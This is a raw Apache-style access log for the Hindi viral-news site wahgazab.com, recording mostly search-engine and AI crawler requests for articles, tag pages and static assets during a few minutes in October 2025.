23.21.204.95 - - [19/Oct/2025:11:18:45 -0400] "GET /tag/bihar-engineer-kidnapped/ HTTP/1.1" 200 121906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.68.247.218 - - [19/Oct/2025:11:18:46 -0400] "GET /tag/india-vs-bangladesh-news/ HTTP/1.1" 200 125265 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
18.214.186.220 - - [19/Oct/2025:11:18:52 -0400] "GET /tag/aliens-spotted-in-moon/ HTTP/1.1" 200 121701 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.168 - - [19/Oct/2025:11:19:06 -0400] "GET /?a=60911634800&channel=646275&from=news.php%3Fid%3D6348-877%26name%3DNTN+2209SKC3+%E8%87%AA%E5%8B%95%E8%AA%BF%E5%BF%83%E7%8E%89%E8%BB%B8%E5%8F%97+%E3%81%99%E3%81%8D%E3%81%BE%E5%A4%A7%E3%83%86%E3%83%BC%E3%83%91%E7%A9%B4+%E5%86%85%E8%BC%AA%E5%BE%8445mm+%E5%A4%96%E8%BC%AA%E5%BE%8485mm++%E5%B9%8523mm%EF%BC%88NTN+%E8%87%AA%E5%8B%95%E8%AA%BF%E5%BF%83%E7%8E%89%E8%BB%B8%E5%8F%97%EF%BC%88%E3%81%99%E3%81%8D%E3%81%BE%E5%A4%A7+%E3%83%86%E3%83%BC%E3%83%91%E7%A9%B4%E3%82%BF%E3%82%A4%E3%83%97%EF%BC%89+1216SKC3%E3%80%90%E9%80%81%E6%96%99%E7%84%A1%E6%96%99%E3%80%91%EF%BC%89 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.168 - - [19/Oct/2025:11:19:07 -0400] "GET /?a=60911634800&channel=646275&from=news.php%3Fid%3D6348-877%26name%3DNTN%202209SKC3%20%E8%87%AA%E5%8B%95%E8%AA%BF%E5%BF%83%E7%8E%89%E8%BB%B8%E5%8F%97%20%E3%81%99%E3%81%8D%E3%81%BE%E5%A4%A7%E3%83%86%E3%83%BC%E3%83%91%E7%A9%B4%20%E5%86%85%E8%BC%AA%E5%BE%8445mm%20%E5%A4%96%E8%BC%AA%E5%BE%8485mm%20%20%E5%B9%8523mm%EF%BC%88NTN%20%E8%87%AA%E5%8B%95%E8%AA%BF%E5%BF%83%E7%8E%89%E8%BB%B8%E5%8F%97%EF%BC%88%E3%81%99%E3%81%8D%E3%81%BE%E5%A4%A7%20%E3%83%86%E3%83%BC%E3%83%91%E7%A9%B4%E3%82%BF%E3%82%A4%E3%83%97%EF%BC%89%201216SKC3%E3%80%90%E9%80%81%E6%96%99%E7%84%A1%E6%96%99%E3%80%91%EF%BC%89 HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
44.215.231.15 - - [19/Oct/2025:11:19:23 -0400] "GET /this-thread-neither-a-thread-nor-a-noodle-know-the-truth-behind-it/ HTTP/1.1" 200 281798 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
98.82.63.147 - - [19/Oct/2025:11:19:27 -0400] "GET /author/wah4/page/18/ HTTP/1.1" 200 179859 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
17.241.75.108 - - [19/Oct/2025:11:19:35 -0400] "GET /wp-content/uploads/2016/04/cover27-150x150.jpg HTTP/1.1" 200 8459 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.54 - - [19/Oct/2025:11:19:36 -0400] "GET /tag/police-caught-the-kid/ HTTP/1.1" 200 121748 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.79.168 - - [19/Oct/2025:11:19:53 -0400] "GET /tag/sunny-to-work-with-shahrukh-khan/feed/ HTTP/1.1" 200 7941 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.168 - - [19/Oct/2025:11:19:59 -0400] "GET /?a=7801188056001&channel=176531&from=brands.php%3Fid%3D880560-1932%26name%3D%E3%82%AB%E3%82%AF%E3%83%80%E3%82%A4+%E6%B4%97%E9%9D%A2%E7%94%A8%E8%9B%87%E5%8F%A3+%E5%8F%B0+%E5%8D%98%E6%B0%B4%E6%A0%93+%E7%AB%8B%E6%B0%B4%E6%A0%93+%E5%90%90%E6%B0%B4%E5%8F%A3%E9%AB%98%E3%81%95170mm+%E4%B8%80%E8%88%AC%E5%9C%B0+721-213-13 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:11:19:59 -0400] "GET /womens-day-special HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.249.79.168 - - [19/Oct/2025:11:19:59 -0400] "GET /?a=7801188056001&channel=176531&from=brands.php%3Fid%3D880560-1932%26name%3D%E3%82%AB%E3%82%AF%E3%83%80%E3%82%A4%20%E6%B4%97%E9%9D%A2%E7%94%A8%E8%9B%87%E5%8F%A3%20%E5%8F%B0%20%E5%8D%98%E6%B0%B4%E6%A0%93%20%E7%AB%8B%E6%B0%B4%E6%A0%93%20%E5%90%90%E6%B0%B4%E5%8F%A3%E9%AB%98%E3%81%95170mm%20%E4%B8%80%E8%88%AC%E5%9C%B0%20721-213-13 HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:11:20:00 -0400] "GET /womens-day-special/ HTTP/1.1" 200 285636 "http://wahgazab.com/womens-day-special" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.249.79.168 - - [19/Oct/2025:11:20:06 -0400] "GET /?a=83987154676201&channel=98f81c&from=product.php%3Fid%3D1546762-304%26name%3Dlogicool+G+PRO+X+SUPERLIGHT+%E3%83%9B%E3%83%AF%E3%82%A4%E3%83%88 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.168 - - [19/Oct/2025:11:20:07 -0400] "GET /?a=83987154676201&channel=98f81c&from=product.php%3Fid%3D1546762-304%26name%3Dlogicool%20G%20PRO%20X%20SUPERLIGHT%20%E3%83%9B%E3%83%AF%E3%82%A4%E3%83%88 HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:11:21:00 -0400] "GET /people-of-this-village-push-their-teenaged-girls-into-prostitution HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:21:00 -0400] "GET /people-of-this-village-push-their-teenaged-girls-into-prostitution/ HTTP/1.1" 200 282297 "http://wahgazab.com/people-of-this-village-push-their-teenaged-girls-into-prostitution" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
57.141.0.69 - - [19/Oct/2025:11:21:07 -0400] "GET /these-tricks-brings-you-good-luck-and-make-you-succeed-in-life/ HTTP/1.1" 200 283663 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
51.75.236.152 - - [19/Oct/2025:11:21:18 -0400] "GET /tag/rajdhani-train-jokes/ HTTP/1.1" 200 121463 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.79.169 - - [19/Oct/2025:11:21:26 -0400] "GET /?a=8350627532800&channel=267790&from=pin.php%3Fid%3D275328-5163%26name%3D%E3%83%80%E3%82%A4%E3%83%AF%28DAIWA%29%E3%83%90%E3%83%83%E3%82%B0%E3%83%BB%E3%82%BF%E3%83%83%E3%82%AF%E3%83%AB%E5%8F%8E%E7%B4%8D%E7%94%A8%E5%93%81%2F%E3%83%90%E3%83%83%E3%82%B0+%E3%82%BB%E3%83%9F%E3%83%8F%E3%83%BC%E3%83%89%E3%83%AA%E3%83%BC%E3%83%AB%E3%82%AB%E3%83%90%E3%83%BC+SP-M%28A%29+SV HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.170 - - [19/Oct/2025:11:21:27 -0400] "GET /?a=8350627532800&channel=267790&from=pin.php%3Fid%3D275328-5163%26name%3D%E3%83%80%E3%82%A4%E3%83%AF%28DAIWA%29%E3%83%90%E3%83%83%E3%82%B0%E3%83%BB%E3%82%BF%E3%83%83%E3%82%AF%E3%83%AB%E5%8F%8E%E7%B4%8D%E7%94%A8%E5%93%81%2F%E3%83%90%E3%83%83%E3%82%B0%20%E3%82%BB%E3%83%9F%E3%83%8F%E3%83%BC%E3%83%89%E3%83%AA%E3%83%BC%E3%83%AB%E3%82%AB%E3%83%90%E3%83%BC%20SP-M%28A%29%20SV HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.135 - - [19/Oct/2025:11:22:25 -0400] "GET /girls-does-these-7-promises-to-her-future-husbands/serious-couple HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:22:25 -0400] "GET /girls-does-these-7-promises-to-her-future-husbands/serious-couple/ HTTP/1.1" 200 122175 "http://wahgazab.com/girls-does-these-7-promises-to-her-future-husbands/serious-couple" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
92.222.108.110 - - [19/Oct/2025:11:22:41 -0400] "GET /wp-content/uploads/2016/03/cover32.jpg HTTP/1.1" 200 81007 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
17.241.75.200 - - [19/Oct/2025:11:23:29 -0400] "GET /wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=492e3cf54bd42df3b24a3de8e2307cafx HTTP/1.1" 200 38952 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.150 - - [19/Oct/2025:11:23:30 -0400] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 13577 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.232 - - [19/Oct/2025:11:23:30 -0400] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 87553 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.88 - - [19/Oct/2025:11:23:31 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=492e3cf54bd42df3b24a3de8e2307cafx HTTP/1.1" 200 173151 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.110 - - [19/Oct/2025:11:23:31 -0400] "GET /wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 48249 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.196 - - [19/Oct/2025:11:23:32 -0400] "GET /wp-content/themes/Newspaper/style.css?ver=12.7.1 HTTP/1.1" 200 158737 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.27 - - [19/Oct/2025:11:23:32 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=12.7.1 HTTP/1.1" 200 160112 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.150 - - [19/Oct/2025:11:23:33 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdSmartSidebar.js?ver=12.7.1 HTTP/1.1" 200 9966 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.198 - - [19/Oct/2025:11:23:33 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 29694 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.23 - - [19/Oct/2025:11:23:34 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdToTop.js?ver=12.7.1 HTTP/1.1" 200 1426 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.110 - - [19/Oct/2025:11:23:34 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdLoginMobile.js?ver=12.7.1 HTTP/1.1" 200 6347 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.58 - - [19/Oct/2025:11:23:35 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdAjaxSearch.js?ver=12.7.1 HTTP/1.1" 200 6145 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.150 - - [19/Oct/2025:11:23:35 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/tdbSearch.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 5945 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.27 - - [19/Oct/2025:11:23:36 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/tdbMenu.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 10781 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.144 - - [19/Oct/2025:11:23:36 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdMenu.js?ver=12.7.1 HTTP/1.1" 200 4530 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.220 - - [19/Oct/2025:11:23:37 -0400] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.8.3 HTTP/1.1" 200 19251 "http://wahgazab.com/tag/police-caught-the-kid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.135 - - [19/Oct/2025:11:23:43 -0400] "GET /day-after-pakistan-blasts-afganistan-shocks-with-terror/hhhhhh HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:23:44 -0400] "GET /day-after-pakistan-blasts-afganistan-shocks-with-terror/hhhhhh/ HTTP/1.1" 200 121580 "http://wahgazab.com/day-after-pakistan-blasts-afganistan-shocks-with-terror/hhhhhh" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
51.75.236.136 - - [19/Oct/2025:11:23:50 -0400] "GET /tag/santa-jokes-news-in-hindi/ HTTP/1.1" 200 121503 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.79.168 - - [19/Oct/2025:11:23:59 -0400] "GET /?a=11992108882601&channel=adfca9&from=info.php%3Fid%3D1088826-3964%26name%3D%E3%82%AA%E3%83%BC%E3%83%88%E3%83%90%E3%82%A4%E7%94%A8+%E3%83%86%E3%83%BC%E3%83%AB%E3%82%BB%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3+%E3%83%AA%E3%82%A2%E3%83%95%E3%82%A7%E3%82%A2%E3%83%AA%E3%83%B3%E3%82%B0+%E3%83%89%E3%82%A5%E3%82%AB%E3%83%86%E3%82%A3%E7%94%A8+%E3%83%A2%E3%83%87%E3%83%AB+1199+899+1199S+1199R+2012-2015 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.168 - - [19/Oct/2025:11:23:59 -0400] "GET /?a=11992108882601&channel=adfca9&from=info.php%3Fid%3D1088826-3964%26name%3D%E3%82%AA%E3%83%BC%E3%83%88%E3%83%90%E3%82%A4%E7%94%A8%20%E3%83%86%E3%83%BC%E3%83%AB%E3%82%BB%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%20%E3%83%AA%E3%82%A2%E3%83%95%E3%82%A7%E3%82%A2%E3%83%AA%E3%83%B3%E3%82%B0%20%E3%83%89%E3%82%A5%E3%82%AB%E3%83%86%E3%82%A3%E7%94%A8%20%E3%83%A2%E3%83%87%E3%83%AB%201199%20899%201199S%201199R%202012-2015 HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.241.219.73 - - [19/Oct/2025:11:24:55 -0400] "GET /wp-content/uploads/2017/12/guru-nanak-dev-himself-founded-this-Gurudwara-Nanak-Piao-Sahib-intro-150x150.jpg HTTP/1.1" 200 6479 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.19.112 - - [19/Oct/2025:11:25:05 -0400] "GET /wp-content/uploads/2016/06/woman-slept-with-her-pet-python-every-night1-150x150.jpg HTTP/1.1" 404 136514 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.79.170 - - [19/Oct/2025:11:25:06 -0400] "GET /?a=7278094485016&channel=c000d1&from=shop.php%3Fid%3D944850-5212%26name%3D%E3%82%A2%E3%83%87%E3%82%A3%E3%83%80%E3%82%B9+adidas+%E3%83%9E%E3%82%B9%E3%83%88%E3%83%8F%E3%83%96+%E3%82%B9%E3%83%A2%E3%83%BC%E3%83%AB%E3%83%AD%E3%82%B4+%E3%83%AC%E3%82%AE%E3%83%A5%E3%83%A9%E3%83%BC%E3%83%95%E3%82%A3%E3%83%83%E3%83%88WIND.RDY%E3%83%95%E3%83%BC%E3%83%89%E4%BB%98%E3%81%8D%E3%82%A6%E3%82%A4%E3%83%B3%E3%83%89%E3%83%96%E3%83%AC%E3%83%BC%E3%82%AB%E3%83%BC%E3%82%B8%E3%83%A3%E3%82%B1%E3%83%83%E3%83%88+%E3%82%A6%E3%82%A7%E3%82%A2+%E3%82%B8%E3%83%A0+%E3%83%88%E3%83%AC%E3%83%BC%E3%83%8B%E3%83%B3%E3%82%B0+%E9%81%8B%E5%8B%95+%E3%82%A6%E3%82%A9%E3%83%BC%E3%82%AD%E3%83%B3%E3%82%B0++KWX77+JG8531+%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.170 - - [19/Oct/2025:11:25:07 -0400] "GET /?a=7278094485016&channel=c000d1&from=shop.php%3Fid%3D944850-5212%26name%3D%E3%82%A2%E3%83%87%E3%82%A3%E3%83%80%E3%82%B9%20adidas%20%E3%83%9E%E3%82%B9%E3%83%88%E3%83%8F%E3%83%96%20%E3%82%B9%E3%83%A2%E3%83%BC%E3%83%AB%E3%83%AD%E3%82%B4%20%E3%83%AC%E3%82%AE%E3%83%A5%E3%83%A9%E3%83%BC%E3%83%95%E3%82%A3%E3%83%83%E3%83%88WIND.RDY%E3%83%95%E3%83%BC%E3%83%89%E4%BB%98%E3%81%8D%E3%82%A6%E3%82%A4%E3%83%B3%E3%83%89%E3%83%96%E3%83%AC%E3%83%BC%E3%82%AB%E3%83%BC%E3%82%B8%E3%83%A3%E3%82%B1%E3%83%83%E3%83%88%20%E3%82%A6%E3%82%A7%E3%82%A2%20%E3%82%B8%E3%83%A0%20%E3%83%88%E3%83%AC%E3%83%BC%E3%83%8B%E3%83%B3%E3%82%B0%20%E9%81%8B%E5%8B%95%20%E3%82%A6%E3%82%A9%E3%83%BC%E3%82%AD%E3%83%B3%E3%82%B0%20%20KWX77%20JG8531%20%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
18.142.153.169 - - [19/Oct/2025:11:25:27 -0400] "GET /wp-content/uploads/2016/02/%E0%A4%96%E0%A5%81%E0%A4%B2%E0%A5%87-%E0%A4%AE%E0%A5%87%E0%A4%82-%E0%A4%B0%E0%A4%96%E0%A4%BE-%E0%A4%9C%E0%A4%BE%E0%A4%A4%E0%A4%BE-%E0%A4%B9%E0%A5%88-%E0%A4%B6%E0%A4%B5.jpg HTTP/1.1" 200 222310 "-" "Mozilla/5.0 (compatible; crawler)"
5.39.1.250 - - [19/Oct/2025:11:26:21 -0400] "GET /tag/an-ufo-seen-in-shimla/ HTTP/1.1" 200 121716 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.93.171 - - [19/Oct/2025:11:26:31 -0400] "HEAD /feed/ HTTP/1.1" 200 - "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
216.73.216.135 - - [19/Oct/2025:11:26:46 -0400] "GET /freedom-251-becomes-a-chaos HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:26:46 -0400] "GET /the-mystery-of-these-four-shaktipeeth-have-not-been-solved-till-today HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:26:46 -0400] "GET /freedom-251-becomes-a-chaos/ HTTP/1.1" 200 283221 "http://wahgazab.com/freedom-251-becomes-a-chaos" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:26:47 -0400] "GET /the-mystery-of-these-four-shaktipeeth-have-not-been-solved-till-today/ HTTP/1.1" 200 286825 "http://wahgazab.com/the-mystery-of-these-four-shaktipeeth-have-not-been-solved-till-today" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.247 - - [19/Oct/2025:11:27:16 -0400] "GET /robots.txt HTTP/1.1" 200 112 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:27:29 -0400] "GET /this-magical-thread-will-make-you-rich-and-prosperous/red-feature HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:27:29 -0400] "GET /this-magical-thread-will-make-you-rich-and-prosperous/red-feature/ HTTP/1.1" 200 121640 "http://wahgazab.com/this-magical-thread-will-make-you-rich-and-prosperous/red-feature" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
57.141.0.75 - - [19/Oct/2025:11:27:42 -0400] "GET /angoori-bhabhi-throws-tantrums-on-and-off-set/ HTTP/1.1" 200 282235 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.93.169 - - [19/Oct/2025:11:27:48 -0400] "HEAD /wp-content/uploads/2017/09/maxresdefault-3.jpg HTTP/1.1" 200 - "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
92.222.104.194 - - [19/Oct/2025:11:28:05 -0400] "GET /wp-content/uploads/2017/06/ufo.jpg HTTP/1.1" 200 96781 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
